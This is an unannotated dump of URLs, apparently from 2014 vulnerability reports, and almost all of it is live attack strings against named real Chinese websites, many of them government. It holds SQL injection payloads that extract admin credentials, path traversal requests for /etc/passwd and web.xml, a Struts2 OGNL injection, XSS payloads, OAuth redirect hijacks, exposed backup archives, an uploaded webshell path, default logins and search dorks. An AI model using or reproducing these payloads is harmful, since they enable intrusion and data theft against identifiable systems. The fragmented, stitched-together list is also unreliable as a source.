http://www.colorful.cn/JishuList.aspx?id=12101509594818660dc6d78062fef4d73a8b http://www.colorful.cn/ColorfulNewDetails.aspx?id=1312c321776344fe4975917d082db085326b http://www.colorful.cn/ColorfulProductdetails.aspx?id=130781bbf68a799442b6b7183b642caca75a http://admin.colorful.cn/Common/ShowMobileImage.ashx?id=1404f2e9c238627c4b05a82aa0069108b6f0 http://admin.colorful.cn/Common/ShowImage.ashx?id=1307f25a656aa4ea45838d73e64b1ead6602 http://admin.colorful.cn/Common/ShowImage.ashx?id=13125b9f760c3a9742629e752fb4b9b2d46c&width=55&height=55 http://m.colorful.cn/NewDetails.aspx?id=1312c321776344fe4975917d082db085326b http://m.colorful.cn/ColorfulAwards.aspx?colorfulid=4 http://m.colorful.cn/ColorfulAwards.aspx?Time=2013 http://m.colorful.cn/ProductDetails.aspx?id=13080918d7c248a04845925d64d040587611&CataId=1210091043471234035ab2610de009ec8235 http://m.colorful.cn/ProductDetails.aspx?id=668f8384-0685-4a70-895c-8f9eb39db020 
http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA http://www.gjtjt.cn:8080/ http://www.gjtjt.cn:8081/ www.nikon.com.cn/db.rar www.nikon.com.cn/pass.exe http://yy.sogou.com/gamecenter/ Date:2014-04-30 OS:Windows http://yy.sogou.com/gamecenter/ http://11185.bjpost.com.cn:80/fp/other/member!memberLogin.action http://bt.ktxp.com/db.rar http://bt.ktxp.com/pass.exe http://bt.ktxp.com/wwwroot.zip http://bt.ktxp.com/backup.rar http://bp.maxthon.com/gl?l=cn&p=max4&c=zh-cn http://180.153.27.6/zc/ http://www.air-spring.com/zc/ www.air-spring.com http://www.air-spring.com http://cloud.letv.com/ledisk//appupdate/index?v http://vip.cctd.com.cn/jsp/index.action?page=index http://www.gzipo.gov.cn/admin/jsp/cms/content/attachment/attachment.jsp?module=001010&contentId=0 http://www.ncsshk.com/manage/ewebeditor/db/ewebeditor.mdb http://www.ncsshk.com/manage/Main.asp http://www.xk57.com/listen/en/歌曲编号 http://www.xk57.com/listen/vip/歌曲编号 http://www.xk57.com/listen/zb/歌曲编号 http://www.neworiental-k12.org/ http://www.neworiental-k12.org/search.asp http://www.utt.com.cn/ http://www.sanfu.com/?do=display&mod=goods&id=6596 http://www.sanfu.com/admin/ http://58.22.154.146/users/ http://58.22.154.146/download/ http://58.22.154.146/System/ http://58.22.154.146/report/ http://58.22.154.146/Images/ http://58.22.154.146/Inc/ http://58.22.154.146:1001/ inurl:Art_View.asp?ID= inurl:asp?ID= http://www.xhkjj.gov.cn/Art_View.asp?ID=677 http://www.wysxmj.gov.cn/Art_View.asp?ID=422 http://www.sctrh.com/Art_View.asp?ID=242 
http://www.dzzwy.com/Art_View.asp?ID=329 http://www.dzqxfc.com/Art_View.asp?ID=94 http://www.dzngfzyr.com/Pic_View.asp?ID=41 http://www.hxjzjx.cn/Pic_View.asp?ID=261 http://www.dzjinheng.cn/Art_View.asp?ID=142 http://www.pxgas.cn/Art_View.asp?ID=318 http://www.dfssilk.com/NewsView.asp?ID=587 http://183.60.44.5/platform/login.php http://www.google.de/#newwindow=1&q=/zlxz/down.aspx http://www.lhfgc.gov.cn/zlxz/down.aspx http://www.lhfgc.gov.cn/zlxz/down.aspx?Url=../zlxz/down.aspx.cs http://www.lhfgc.gov.cn/zlxz/down.aspx?Url=../web.config http://www.ciemc.net/ http://lvyou.baidu.com/user/edit/info http://www.kmdc.gov.cn/gov/list.ashx?id=428&typeId=1 http://onlinemsg.focus.cn/onlinemsg/sendmessage_f.php?senduser_id=1443102 http://onlinemsg.focus.cn/onlinemsg/sendmessage_f.php?senduser_id=1443102 http://blogimg.focus.cn/common/modules/esfmsg/sendmessage_f.php?senduser_id=1443102 http://db.178.com/d3/tw/item-list/q:9 ftp://ftp.founder.com.cn/incoming/ http://data.auto.sina.com.cn/xuanche/getCars.php www.ciprun.cn http://fun.kid.qq.com/ebookController/update_assets_list?campaignID=0%20and%201=1&etclass=0&formatID=3&t=Sun%20May%204%2012%3A56%3A49%20GMT%2B0800%202014&tags=null&templateID=478 http://fun.kid.qq.com/ebookController/update_assets_list?campaignID=0%20and%201=2&etclass=0&formatID=3&t=Sun%20May%204%2012%3A56%3A49%20GMT%2B0800%202014&tags=null&templateID=478 http://career.huawei.com/campus/pages/job/job.aspx inurl:sydwzk/demand inurl:sydwzk/download/Down.jsp http://www.zzsyzp.com/syrcservlet?RequestType=SHOWINFO&memberID=10136&RightCode=Guest&InfoFlag=info http://office.sh.focus.cn/rentsale/agent_rentsale.php?chk_login_id=45654032 http://office.sz.focus.cn/rentsale/agent_rentsale.php?chk_login_id=20512622 
http://office.sh.focus.cn/rentsale/agent_rentsale.php?chk_login_id=45654032&chk_gov_locate_id=10&chk_loopline=%B2%BB%CF%DE%BD%BB%CD%A8%CE%BB%D6%C3&chk_business_circles=%B2%BB%CF%DE%C9%CC%C8%A6&chk_usinged=%B2%BB%CF%DE%D3%C3%CD%BE&chk_fitment=%B2%BB%CF%DE%D7%B0%D0%DE&chk_rentsale=%B2%BB%CF%DE%D7%E2%CA%DB&chk_sort_price_min=&chk_sort_price_max=&chk_sort_rent_min=&chk_sort_rent_max=&chk_area_min=&chk_area_max=&chk_office_name=%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6&Submit_btn=%CB%D1%CB%F7 zb.suning.com/bid-web/picView.htm?name=../../../../../../../../../../etc/passwd zb.suning.com/bid-web/picView.htm?name=../../../../../../../../../../etc/hosts zb.suning.com/bid-web/picView.htm?name=../../../../../../../../../../etc/resolv.conf http://ipay.iapppay.com:8888/admin/g/login.do http://service.iapppay.com:8081/admin/g/login.do http://zhandian.cctv.com/ http://zhandian.cctv.com//webs.php?id=20 http://finance.qq.com/stock/sother/flow_dapan_quotpage.htm http://pages.chinahr.com/2012/bj/spacechina_0327/jobs.asp?chiMemID=200504010002350134&strMemID=200504010002350005 http://223.68.154.38:8000/lms_server/user/userAuthenticate.action http://www.mlecms.com http://www.hihoku.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat%28userid,0x23,pwd%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 https://api.kaixin001.com/oauth2/authorize?client_id=28204214253735367b372d8ced8ef6a5&redirect_uri=http%3A%2F%2Fdiaoyu.org\.passport.kuxun.cn%2Fopenid%2Flogin_kaixin_back&response_type=code&state=4b207c0b266cfcb3ad22058b1aa9b78e&scope=create_records http://suanming.kaiyun.china.com/admin/ 
http://openapi.qzone.qq.com/oauth/show?which=Login&display=pc&scope=get_user_info%2Cget_info%2Cadd_t%2Cadd_pic_t%2Cget_other_info%2Cget_fanslist%2Cget_idollist%2Cadd_idol%2Cadd_share&redirect_uri=http%3A%2F%2Fpujun.li?@www.zhihu.com%2Foauth%2Fauth%2Frequest_qqconn_token%3Fnext%3D%252Foauth%252Faccount_callback&response_type=code&client_id=100490701 http://www.dianping.com/review/52233135 http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined http://yksuit.com/ http://events.dianping.com/guphoto/game.aspx#1 http://o.sys.www.dianping.com/opreply/reply/detailsManage.action?feedType=11&feedId=3928344 http://www.sigmarobot.com/ http://www.sigmarobot.com/downfile.php?direct=../&file=downfile.php http://www.sigmarobot.com/downfile.php?direct=../&file=utility.php http://www.letvcloud.com/乐视云视频 http://222.240.205.133/wwwroot.rar http://www.mfb.sh.cn/ http://www.xnrf.gov.cn/viewnews.asp?id=432 https://api.weibo.com/oauth2/authorize?client_id=2857799177&redirect_uri=https%3A%2F%2Fdiaoyu.org:\@sae.sina.com.cn%2Fssl%2F%3Fm%3Dsso%26a%3Dweibo_callback%26sccb%3Dhttp%253A%252F%252Fsae.sina.com.cn%252F%253Fm%253Duser%2526a%253Dreg_check_login&response_type=code&forcelogin=true inurl:mail site:homeinns.com intitle:login site:homeinns.com http://shufang.docin.com/ http://tushu.docin.com/ http://huiyi.docin.com/ http://ganjinzhe.com//WEB-INF/database.properties http://resolve.chinanetcenter.com/receiveMail.py http://qudao.dac.pplive.cn/dac/ http://www.sstf.org.cn/show_news.asp?idx=672&act=4 http://www.nanlou.cn/114/showdetail.jsp?oid=543注入漏洞 http://www.hzplanning.gov.cn/DesktopModules/GHJ.PlanningNotice/PublicityInfoGH.aspx?GUID=20131211173416817 http://jxkh.gtja.com/guest/Ask/MyAskList.aspx?QueType= ftp://59.63.169.44/ http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds&callback=updCpsCookieTime 
http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds\ http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds\ http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds\ http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds\ http://www.aheport.gov.cn/tabid/177/language/zh-CN/Default.aspx?GUID=3cfe24aa-c4de-496c-aa79-028de52c79cf http://home.focus.cn/materials/owner_info.php?owner_id=5 http://sz.focus.cn/materials/owner_info.php?owner_id=46 http://cd.focus.cn/materials/owner_info.php?owner_id=9 http://wh.focus.cn/materials/owner_info.php?owner_id=14 http://cq.focus.cn/materials/owner_info.php?owner_id=6 http://acm.pptv.com/ http://cooperation.pplive.com/ http://sr3.pplive.com/upload.php(已修复) http://www.pz.gov.cn/pzweb/GovInfoPub/Department/moreinfo.aspx?DeptCode=001&CategoryNum=001001 http://fuyun.safedog.cn/serverCenter/saveServerTask.html?_t_=随意&__t=随意&serverId=你的服务id&type=12 http://www.first.gov.cn/Main/DeptSubList.aspx?deptcode=403000&deptname=%B0%B2%BB%D5%CA%A1%B9%FA%CD%C1%D7%CA%D4%B4%CC%FC http://www.cmdi.chinamobile.com/ https://bambookbbs.sdo.com/ http://mail.imun.edu.cn:8080/gw/admin/ http://ows-dfppe.sf-express.com/ows-dfp/$%7Bpath%7D/coverage_area!getCoverageCityList.action url:http://www.jmyan.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://studytv.cctv.com/ http://studytv.cctv.com/activity/list?KeyWord=1 http://hegui.xsdzq.cn:8080/ksportal/aml/map/mapbranchinfo.jsp?area_id=29正常,http://hegui.xsdzq.cn:8080/ksportal/aml/map/mapbranchinfo.jsp?area_id=29报错,即可能存在SQL注入,带入SQLMAP工具 http://www.fyyhbank.com/display.php?id=328 http://www.cncn.org.cn/ http://ows-dfppe.sf-express.com/ows-dfp/service_time!getCityByProvince.action http://ows-dfppe.sf-express.com/ows-dfp/service_time!getAreaByCity.action 
http://ows-dfppe.sf-express.com/ows-dfp/service_time!getCountyByArea.action http://www.xd.com/email_verify/email_set/?email=189837992%40qq.com&_=1399282088546 http://www.xd.com/security/forget_pass http://multimedia.tcl.com/cn/general/main.do?method=search&keyword=aa http://home.focus.cn/group/vote.php?v_poll_id=4679'&group_id=607 hyfw.12306.cn/hyinfo/action/JgxxAction_jsjjfl http://hyfw.12306.cn http://wf.tju.edu.cn/zh_wx/sub3.php?type=5&id=4 hack:site:gov.cn inurl:new_info_dowload.jsp http://www.jx-star.com/xtgly/new_info_dowload.jsp?wj=/WEB-INF/web.xml http://bbs.tcl.com/survey/Survey/PSW_.asp?url%EF%BC%9D201232614496.asp http://tdm.rails.com.cn/login/loginDown!onDownload.action http://lighting.tcl.com/cn/resources-d.aspx?ID=401&SortID=98 http://wap.alpha.wochacha.com/.svn/entries http://www.familymart.com.cn/system/login http://www.familymart.com.cn/system/brand/BrandEdit?id=16 http://d1.sina.com.cn/litong/zhitou/sinaads/release/pbv5.html?flash${}http://xxx.sina.com.cn/%22${}http://s.sina.com.cn/%22xxx${}950${}450${}http://sax.sina.com.cn/mfp/click?ccc&a=%3Cmeta%20charset=%22utf-8%22%3E http://cie.lnc.edu.cn/ http://mss-oa.taikanglife.com/login/userInfo!isCanSendPwd.action http://demo.hanweb.com/jact/admin/login/login.action http://bbs.51credit.com/forum.php?mod=viewthread&tid=1816118&extra=page%3D1 http://jjy.hubu.edu.cn/index.action http://www.spgbid.com/spgbid/homeAction/homeAction.action http://www.spgbid.com/system.jsp http://vcloud.sdidc.com.cn/product.do?act=productlist&type=402881ff3cfa6aec013cfa8aa6fa0010 http://vcloud.sdidc.com.cn/login.do?act=logout http://cssotest.kingdee.com/ 
http://cssotest.kingdee.com/knowledge/search/searchKnowledge!knowledgeSearch.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://bjd.tcl.com/ http://www.bj.10086.cn/service/fee/czjf/ http://epay.bj.chinamobile.com/paymentAction.do?method=queryBalance2&payPhone=13811543995 http://www.muzhiwan.com/ http://openapi.qzone.qq.com/oauth/show?which=ConfirmPage&display=pc&response_type=code&client_id=204566&redirect_uri=http%3A%2F%2Fapp.56.com\@pujun.li&state=048cf6b68d98606939f0287860c53235 http://mse.tju.edu.cn/gtxb/artd.php?ty=4&tp=2 http://www.capub.cn:8888/ site:www.capub.cn http://www.yibao.com/api/rest.php/createBanner?advertising_id=17 http://www.yibao.com/api/rest.php/createBanner?advertising_id=17 http://www.yibao.com/api/rest.php/createBanner?advertising_id=17 http://tool.chinaz.com/pagestatus/?url=www.goodidc.org www.dagexing.com www.dagexing.com http://book.dahe.cn http://book.dahe.cn/book/view.asp?bh=316392 www.dagexing.com存在OpenSSL漏洞,请尽快修补! 
http://www.maxen.com.cn/map/map.php?id=2 http://www.maxen.com.cn/test.php http://demo.ev123.net/dom/register.php inurl:info_details.jsp?seq http://211.87.126.13/index/editor/admin/login.jsp http://xggl.bjmu.edu.cn:8081/eWebEditor_V5.0/admin/default.jsp http://www.usrn.edu.cn/eWebEditor_V5.0/admin/default.jsp http://210.38.57.70:8180/eWebEditor_V5.0/admin/default.jsp http://211.65.116.18/editor/admin/default.jsp http://202.204.208.108:8092/ftc/editor/admin/login.jsp http://www.biem.edu.cn/editor/admin/default.jsp https://udb.duowan.com/s/yyid/index.do http://www.aachina.net/search.php?search=search&searchword=4Cub3IhuFH6 http://zj.qq.com/a/20140506/008144.htm http://page.vote.qq.com/?id=6225490&tpl=mini&result=no http://www.myhack58.com/Article/html/3/62/2012/35468.htm http://120.199.223.78/oa/Mintec/accessory_upload.asp?form=AddJobContactShan&variable=Accessory http://125.210.34.236/index.action http://www.verycd.com/shop/list/video/ http://www.amazon.cn/%E7%99%BD%E5%B8%BD%E5%AD%90%E8%AE%B2Web%E5%AE%89%E5%85%A8-%E5%90%B4%E7%BF%B0%E6%B8%85/dp/B007L5BZKG/ref=sr_1_1?ie=UTF8&qid=1399286811&sr=8-1&keywords=%E7%99%BD%E5%B8%BD%E5%AD%90 http://www.cinsa.cn/sitecn/union_danwei.aspx?id=0 http://www.cinsa.cn/sitecn/search.aspx?keyword= http://www.cctraffic.com.cn/modals.jsp?bid=27&aid=1694 http://cczfbz.changchun.gov.cn/modal.jsp?aid=12141 http://221.8.13.176/modal.jsp?aid=7 http://www.cccyzgw.gov.cn/modal.jsp?aid=961 http://221.8.38.134/zhujian/modal.jsp?aid=39640 http://www.ccsjzglz.cn/modal.jsp?aid=317 http://www.jlnanx.com/modal.jsp?aid=749 http://www.jlsnsxh.com/modal.jsp?aid=27 http://www.ccjks.com/model.jsp?id=620&aid=45 http://221.8.38.134/nasg/modal.jsp?aid=8364 http://www.ccfwy.gov.cn/ztyj/index.jsp http://target/cms/system/selectUsers.jsp url:http://city2010.house.sina.com.cn/myphoto.php?uid=1731978885&type_ext=1&ctype=1 http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146 http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146 
http://jfl.czedu.com.cn/index301-im http://111.205.155.6/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://agent.xinnet.com/html/index.htm,fiddler断点截包,更改X-Forwarded-For字段:192.168.1.1',服务器报500错误,如图: http://calendar.hexun.com/iframe_line.aspx?ct=2&enddate=2014-05-07&et=1&isseach=0&sct=1&startdate=2013-05-07 http://calendar.hexun.com/iframe_line.aspx?ct=2&enddate=2014-05-07&et=200000&isseach=0&sct=1&startdate=2013-05-07 http://www.taoshouyou.com/plugin.php?id=onshuo:buy&gid=16772&buy_amount=1 http://www.taoshouyou.com/plugin.php?id=onshuo:dc_second&gameid=9 http://bbs.gome.com.cn/thread-52588-1-1.html http://www.yiliang.gov.cn/ http://61.163.192.103:9999/cszm/login.action http://61.163.192.103:9999/cszm/bak.jsp http://ui.letv.com/ http://bbs.wangjiu.com/forum.php http://licaike.hexun.com/GjzDetail.action?prodCode=400008&prodType=S http://licaike.hexun.com/GjzDetail.action?prodCode=400008%20and%201=1&prodType=S http://licaike.hexun.com/GjzDetail.action?prodCode=400008%20and%201=2&prodType=S http://licaike.hexun.com/test.php sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin www.goapk.com http://g.pptv.com/ http://www.enetedu.com/index.php/Course2/teachScience?&name=%B9%A4%D1%A7中的name参数存在SQL注入漏洞,用sqlmap测试如下: http://www.ahjcy.gov.cn/jcy-news/newsinfo.jsp?id=9160 http://315.stock.hexun.com/ http://315.stock.hexun.com/login.action http://www.taoshouyou.com/taoshouyou.rar http://www.cqyc.gov.cn/jis/interface/offer.jsp?flag=user http://wwww.sihong.gov.cn/jis/interface/offer.jsp?flag=user http://www.wooyun.org http://www.wooyun.org http://pushmail.263.net/ http://pushmail.263.net/login_check.php http://cmwq.eisaas.cn/xsgj/index.jsp http://124.119.4.30/ http://www.114menhu.com/ www.114menhu.com http://www.114menhu.com http://127.0.0.1/showuser.aspx?orderby=111111&ordertype=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&page=1 
http://127.0.0.1/showuser.aspx?orderby=%22%3C/script%3E%3Cimg%20src=1%20onerror=alert%281%29%3E&ordertype=111111&page=1 http://10.65.40.6/showtemplate.aspx http://db.auto.sohu.com/baike_upload/baike_update.sip?id=31 http://monitor.jlu.edu.cn/cacti/graph_view.php?action=tree&tree_id=3&leaf_id=44 http://yn-zwdt.chinayn.gov.cn http://www.linyiyj.gov.cn/hack.txt http://www.linyiyj.gov.cn/index.htm http://gp.pep.com.cn/ http://gp.pep.com.cn/guopei/website/news/info.aspx?content_uid=d1d9c156-fe98-4d36-a9ac-4d2c0c4c2793 http://www.mailer.com.cn/Products6.html,用户量挺大。 http://www.mailer.com.cn/demo/ http://mail.mailer.cn/ http://mail.mailer.cn/jdwm/cgi/getpwd.cgi http://mail.mailer.cn/ http://mail.mailer.cn/ http://mail.mailer.cn/ http://mail.mailer.cn/jdwm/cgi/file_disk.cgi?0+0+0++unlink=007 http://mail.mailer.cn/jdwm/cgi/file_disk.cgi?0+0+0++unlink=007 www.csbt.org.cn http://www.csbt.org.cn/association/association_detail.php?resp_id=39 http://www.csbt.org.cn/upload/upload_detail.php?files_type=1&files_id=102 http://www.csbt.org.cn/tanslation/tanslation_detail.php?id=94&add_flag=1 http://www.csbt.org.cn/association/association_detail2.php?plangg_id=33&t=1 http://www.csbt.org.cn/association/association_detail1.php?bylaws_id=16 http://www.csbt.org.cn/tanslation/tanslation_detail.php?id=89 http://www.csbt.org.cn/news/news_detail.php?n_id=25534&t=1 http://ad.goodbaby.com/multi.php?ids=54545 http://ad.goodbaby.com/multi.php?ids=54545 http://ad.goodbaby.com/multi.php?ids=54545 http://ad.goodbaby.com/multi.php?ids=54545 http://tuan.damaow.com/?code=save&mod=../../../../../../../../../../etc/passwd%00.jpg http://www.verycd.com/base/add http://fx.sx.189.cn/login.do http://fx.sx.189.cn:80/ http://www.hl.jcy.gov.cn/xiangxi.aspx?ID=832&mkbm=17 http://see.bupt.edu.cn/school/about/teachers_1.php?id=43 http://see.bupt.edu.cn/school/english/undergraduates3.php?id=1 http://202.***.***.50/login/loginpageforuserb.aspx?LogoutURL=%2flogin URL:http://59.37.49.171:8089/WEB/memberpage/indexB.aspx 
http://www.suyaxing.com:81/WS2004/default.asp http://www.fjzhyz.cn/ http://www.fjzhyz.cn/ws2004/sysmanage/default.asp http://xsst.sinaapp.com/test/xxe_sys.dtd file:///etc/passwd http://www.cqpost.com/Ask/list.aspx?type=NotDeal&catalogID=4 http://tdemo002mp.v5portal.com/ URL:http://tdemo002mp.v5portal.com/articlelist.aspx?wd=1&btnsearch3=1&id=0 inurl:chn*/article.jsp?articleId= inurl:chn*/article.jsp?articleId= http://www.sxky.cn/chn200911180959039/article.jsp?articleId=12645744 http://www.gdpcc.com/chn200905080757464/article.jsp?articleId=293 http://www.csagency.com.cn/chn200909301343130/article.jsp?articleId=2343749 http://www.114menhu.com/UMS/logout/logout.htm admin:admin http://tlzw.tongliao.gov.cn/servlet/FileDownload?filepath=D:\%C9%CF%BA%A3%D7%BF%B7%B1\Tomcat6_tongliao\webapps\ROOT\WEB-INF\web.xml&dispname=web.xml http://www.zwfw.gov.cn/index/downLoadGonggaoAtta.action?filePath=D:\zfwork\tomcat_web_new\webapps\ROOT\WEB-INF\web.xml&fileName=web.xml http://www.whxzfw.gov.cn/index/downLoadFile.action?filePath=/WEB-INF/web.xml&fileName=web.xml http://www.xczwzx.gov.cn/FileDownload?filepath=F:\%C9%CF%BA%A3%D7%BF%B7%B1\Tomcat\webapps\ROOT\WEB-INF/web.xml&dispname=web.xml http://221.229.249.58 http://www.yhmohrss.gov.cn/lemis/netweb/detail/download.jsp?url=/WEB-INF/&filename=web.xml http://www.zjhz.hrss.gov.cn/lemis/netweb/detail/download.jsp?url=/WEB-INF/&filename=web.xml http://www.hzsrsj.gov.cn//lemis/netweb/detail/download.jsp?url=/WEB-INF/&filename=web.xml http://www.zjhz.lss.gov.cn//lemis/netweb/detail/download.jsp?url=/WEB-INF/&filename=web.xml http://search.sina.com.cn/api/apiindex.php?s=subscribe&a=getkeys&stype=1%20and%201=2%20union%20select%201,2,3,database%28%29,user%28%29%23&format=json&callback=jsonp1399471108722 http://search.sina.com.cn/api/apiindex.php?s=subscribe&a=getkeys&stype=1%20and%201=2%20union%20select%201,2,3,group_concat%28table_name%29,5%20from%20information_schema.tables%23&format=json&callback=jsonp1399471108722 inurl:apas/portal/ 
http://website.com/apas/portal/account/checkAcc.jsp?username=admin http://www.smzwzx.com http://www.dhxzfw.gov.cn http://www.sybmfw.gov.cn http://admin.xzcs.gov.cn/newsinfo.aspx?id=14 http://www.ksgl.gov.cn/lttd.php?id=29&page=43 http://www.ksgl.gov.cn/upload/1399450827_dama.php.jpg http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/Web_Org/CW_Default.aspx?infoid=4102&couseid=4102 http://help.tipask.com/q-19260.html http://help.tipask.com/question/editanswer/3608/0.html www.tuniu.com/u/modPasswordSubmit,post“password=123456789&tel=1381682XXXX” http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/Web_Org/User_Retrieve.aspx http://www.***p.gov.cn//index/downLoadFile.action?filePath=/admin/login.jsp&fileName=test.txt inurl:search/list.php?siteId= http://www.cangshan.gov.cn/m/search/list.php?siteId=1 http://xxgk.yingzhou.gov.cn/TMP/left_exa.shtml?action=getContent&SSID=1'&etc=1399449825591 http://xxgk.ahjs.gov.cn/TMP/left_exa.shtml?action=getContent&SSID=1 http://xxgk.ahqy.gov.cn/TMP/left_exa.shtml?action=getContent&SSID=4105 http://mail.10086.cn/ https://www.cmpassport.com/umcsso/notify?passid=***(*号替换为想进入的飞信号)即可进入想进入的飞信号邮箱。 http://www.dczfw.gov.cn/eWebEditor/admin_uploadfile.asp?id=24&dir=../../../ http://sy.uxin.com/game/gamesearch.act?keyWord= admin:123456 http://insurancecard.sino-life.com:7001/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://wooyun.org/bugs/wooyun-2010-059247 http://wo.zdnet.com.cn/page/list1.php http://xss.re http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 http://lady.weibo.com/hiddphp.php?ac=getjcwb&bid=1 http://lady.weibo.com/hiddphp.php?ac=getjcwb&bid=1 http://www.yanta.gov.cn/english/Information.jsp?id=1170&fid=1196&nid=1196 http://www.yanta.gov.cn/gpw/hdjl/ldxx.jsp?flag=3&LeadXx=&pageCurrent=1 http://www.xachanba.com.cn/front/search/search_detail.jsp?id=5961&nid=737 
http://www.xachanba.com.cn/front/zxft/zxftviewEv.go?id=6 http://www.hcnu.edu.cn/1.php http://a2platinum.umaman.com/admin http://eip.countrygarden.com.cn:8080/manager/ http://www.wooyun.org/bugs/wooyun-2014-059827/ http://www.fjzhyz.cn/ws2004 http://www.fjzhyz.cn/ws2004/sysmanage/Resource/resset/default.asp http://blog.xdf.cn/ http://blog.xdf.cn/article-3013426.html http://drops.wooyun.org/papers/1377 http://demo.hanweb.com/jsearch/down.jsp?abspathfile=c:/boot.ini&filename=xxx.txt http://demo.hanweb.com/jsearch/down.jsp?pathfile=./../jsearch/down.jsp&filename=xxx.txt http://202.119.47.33:81/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php http://opac.xmulib.org/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php http://opac.wzu.edu.cn/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php http://dx.10006.info/dx/sousuo.do?action=jixing&jixing=iphone http://www.5ibp.cn/sousuo.do?action=jixing&jixing=iphone http://fx.sx.189.cn/sousuo.do?action=jixing&jixing=中兴 http://video.gzlib.gov.cn/Movie.asp?vProgram_id=9357 http://nba.hupu.com/trade/的页面,跟进就得到了注射点http://nba.hupu.com/trade/select_player.php?select=select_team&team1=8&team2=18&team3=&team4=1: http://bi.anzhi.com http://bi.anzhi.com:80/ http://a1.greentree.cn:8029/Api/index.php/User/getMembershipCardInfo/ ttp://a1.greentree.cn:8029/Api/index.php/User/getCouponsList/ http://a1.greentree.cn:8029/Api/index.php/Permanent/getPermanentHotelList/ http://220.191.210.37/zwdt/qlsx_search.jsp?value= http://220.191.210.37/zwdt/qlsx_search.jsp?curpage=1&type=FX&value= http://122.225.14.156/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=703142&articleId=1559771 http://sb.hyshbx.gov.cn/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=703142&articleId=1559771 http://ggfw.wxlss.gov.cn/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=617299&articleId=823744 http://www.jxhrss.gov.cn:8071/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=759966&articleId=24356 
http://www.jxhrss.gov.cn:8071/3wr/ps/channel/articleContent/articleContent.jsp?catalogId=759966&articleId=24356 http://www.firstelite.net/index.asp http://www.google.com.hk/search?q=+%E6%95%B0%E5%AD%97%E6%A0%A1%E5%9B%AD%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0++%E5%8D%9A%E5%86%A0%E7%A7%91%E6%8A%80+%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89&hl=zh-CN&newwindow=1&safe=strict&cad=&oq=+%E6%95%B0%E5%AD%97%E6%A0%A1%E5%9B%AD%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0++%E5%8D%9A%E5%86%A0%E7%A7%91%E6%8A%80+%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89&gs_l=heirloom-serp.12...908.908.0.1453.1.1.0.0.0.0.0.0..0.0....0...1ac.1.34.heirloom-serp..1.0.0.7fmjMFtQOSI http://www.xaltedu.com:9001/Login.aspx,用户名密码输入 http://www.xaltedu.com:9001/ www.xaltedu.com:9001 http://zp.sta.edu.cn/zpsys/index-news.jsp?WID=ti8tzkvb-2soj-hlzq-awtj-799trk9d9eju http://zp.sta.edu.cn/zpsys/index-news.jsp?WID=ti8tzkvb-2soj-hlzq-awtj-799trk9d9eju 